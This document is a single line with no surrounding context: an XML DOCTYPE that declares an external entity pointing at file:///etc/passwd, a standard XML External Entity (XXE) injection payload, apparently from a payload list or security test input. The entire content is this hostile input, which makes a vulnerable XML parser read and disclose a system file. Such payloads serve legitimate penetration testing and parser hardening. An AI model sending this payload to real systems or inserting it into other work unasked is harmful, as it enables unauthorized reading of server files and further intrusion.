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!DOCTYPE r [<!ENTITY e SYSTEM "file:///etc/passwd">]>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